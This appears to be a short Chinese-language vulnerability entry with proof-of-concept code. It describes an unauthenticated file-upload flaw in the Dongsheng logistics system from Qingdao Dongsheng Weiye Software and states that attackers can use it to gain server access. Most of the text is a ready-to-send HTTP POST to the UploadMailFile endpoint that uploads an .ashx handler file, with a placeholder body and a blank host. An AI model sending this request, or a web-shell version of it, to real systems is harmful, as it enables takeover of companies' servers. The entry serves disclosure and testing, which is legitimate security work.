漏洞描述
青岛东胜伟业软件有限公司初创于 2004 年 11月(前身为青岛景宏物流信息技术有限公司),公司主要业务范围为航运物流相关环节的产品和服务。青岛东胜伟业软件有限公司东胜物流软件存在文件上传漏洞,攻击者可利用该漏洞获取服务器权限。
东胜物流系统UploadMailFile存在文件上传漏洞
PoC代码
POST /CommMng/Print/UploadMailFile HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 234
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="LoadFile"; filename="1.ashx"
Content-Type: application/octet-stream
12312
------WebKitFormBoundary7MA4YWxkTrZu0gW--